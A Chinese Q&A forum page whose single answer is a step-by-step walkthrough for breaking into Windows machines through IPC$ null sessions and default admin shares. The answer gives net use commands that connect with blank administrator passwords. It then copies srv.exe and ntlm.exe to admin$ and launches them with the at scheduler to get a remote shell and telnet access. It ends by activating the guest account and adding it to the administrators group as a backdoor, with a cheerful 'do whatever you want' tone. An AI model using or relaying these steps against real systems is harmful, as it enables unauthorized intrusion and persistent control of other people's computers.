仪器网(yiqi.com)欢迎您!

| 注册 登录
网站首页-资讯-专题- 微头条-话题-产品- 品牌库-搜索-供应商- 展会-招标-采购- 社区-知识-技术-资料库-方案-产品库- 视频

问答社区

怎样利用系统默认共享入侵

寇蛇袒 2016-04-30 22:04:28 369  浏览
  •  

参与评论

全部评论(1条)

  • 94481877 2016-05-01 16:54:36
    这是利用ipc$空连接和默认共享入侵。 空连接和ipc$(internet process connection)是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$)。 相关命令   建立空连接  net use \\IP\ipc$Content$nbsp;"" /user:"" (一定要注意:这一行命令中包含了3个空格)   建立非空连接  net use \\IP\ipc$Content$nbsp;"用户名" /user:"密码" (同样有3个空格)   映射默认共享    net use z: \\IP\c$Content$nbsp;"密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)   如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$   删除一个ipc$连接  net use \\IP\ipc$Content$nbsp;/del   删除共享映射  net use c: /del 删除映射的c盘,其他盘类推   net use * /del 删除全部,会有提示要求按y确认   经典入侵模式   1.C:\>net use \\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators"   这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以diyi个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。   2. C:\>copy srv.exe \\127.0.0.1\admin$Content$nbsp;   先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。   3.C:\>net time \\127.0.0.1   查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。   4.C:\>at \\127.0.0.1 11:05 srv.exe   用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)   5.C:\>net time \\127.0.0.1   再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。   6.C:\>telnet 127.0.0.1 99   这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。   虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了   7.C:\>copy ntlm.exe \\127.0.0.1\admin$Content$nbsp;   用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。   8.C:\WINNT\system32>ntlm   输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!   9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)   为了以防万一,我们再把guest激活加到管理组   10.C:\>net user guest /active:yes   将对方的Guest用户激活   11.C:\>net user guest 1234   将Guest的密码改为1234,或者你要设定的密码   12.C:\>net localgroup administrators guest /add   将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)   ipc$与空连接,139,445端口,默认共享的关系   以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)   ipc$与空连接   不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.   许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).   ipc$与139,445端口   ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.   ipc$与默认共享   默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)   ipc$连接失败的原因   以下5个原因是比较常见的:   1)你的系统不是NT或以上操作系统;   2)对方没有打开ipc$默认共享   3)对方未开启139或445端口(惑被防火墙屏蔽)   4)你的命令输入有误(比如缺少了空格等)   5)用户名或密码错误(空连接当然无所谓了)   另外,你也可以根据返回的错误号分析原因:   错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;   错误号51,Windows 无法找到网络路径 : 网络有问题;   错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);   错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;   错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连

    赞(12)

    回复(0)

    评论

获取验证码
我已经阅读并接受《仪器网服务协议》

热门问答

怎样利用系统默认共享入侵
 
2016-04-30 22:04:28 369 1
怎样禁止ipc$默认共享?
 
2013-12-05 02:23:20 394 2
如何防止XP系统中的IPC$共享入侵!!!
如题
2013-10-18 00:06:00 393 1
如何打开ipc$默认共享?
我的机子是2000的。
2016-01-21 03:03:30 431 1
如何开启IPC$默认共享
 
2016-12-05 06:38:28 402 1
如何添加默认共享和删除IPC$共享
如题
2006-07-20 23:44:27 344 2
如何关闭XP系统的默认共享和IPC$共
 
2018-01-16 16:46:55 410 1
局域网如何使用IPC$访问默认共享
如题,在我的局域网里访问不了对方机器的默认共享。请问怎样才能访问?分为知道对方机器的账号密码和不知道对方机器的账号密码,请分别说明具体步骤和命令。
2014-02-20 06:03:35 383 1
如何关闭win7 IPC$的默认共享
 
2013-01-23 01:30:49 410 2
怎么关掉win 2003的ipc共享和默认共享?拜托了各位 谢谢
怎么关掉win 2003的ipc$共享和默认共享?我关了又会重新开启,!~郁闷,停止server服务是可以关了,可是每次启动系统时,就会弹出一个错误窗口!~如何才可以关了?
2015-01-25 02:19:17 367 2
视频监控系统怎么入侵
 
2012-10-31 22:41:13 384 2
做IPC共享入侵实验提示67错误怎么解决
ping到目标windows20000主机是ping的通的然后我用net use \\目标ip\ipc$ "111" /user:"Administrator"命令尝试进行连接提示67错误 找不到网络名 ipc$不是默认开启的么
2013-06-06 02:54:05 388 1
如何判断对方计算机是否开放IPC$默认共享服务?
 
2012-09-17 11:56:55 398 4
利用IPC$通道入侵现在还能用么?
试着通过IPC$入侵过一段时间,总是出现各种错误,不论在局域网还是宽带。扫描不到139开着的机器,或者得到用户名密码后不能连接等。。有些不知所措了
2010-06-22 21:38:44 359 2
去掉IPC$的默认共享好吗?对电脑有什么影响?
2014-10-15 04:18:13 363 2
视频监控怎样实现共享
视频监控怎样实现共享一个居民点安装了监控,怎样实现每一家都可以查看实时监控,和监控回放。... 视频监控怎样实现共享一个居民点安装了监控,怎样实现每一家都可以查看实时监控,和监控回放。 展开
2018-12-04 12:44:30 217 0
怎样利用arm实现机器视觉系统中的功能
 
2018-11-24 02:05:56 295 0
我的电脑ADMIN$ IPC$ C$ D$ E$ F$默认共享可以取消吗?
害怕对电脑有所影响啊?不知是否可以取消默认共享啊?
2013-11-16 23:17:36 320 1

5月突出贡献榜

推荐主页

最新话题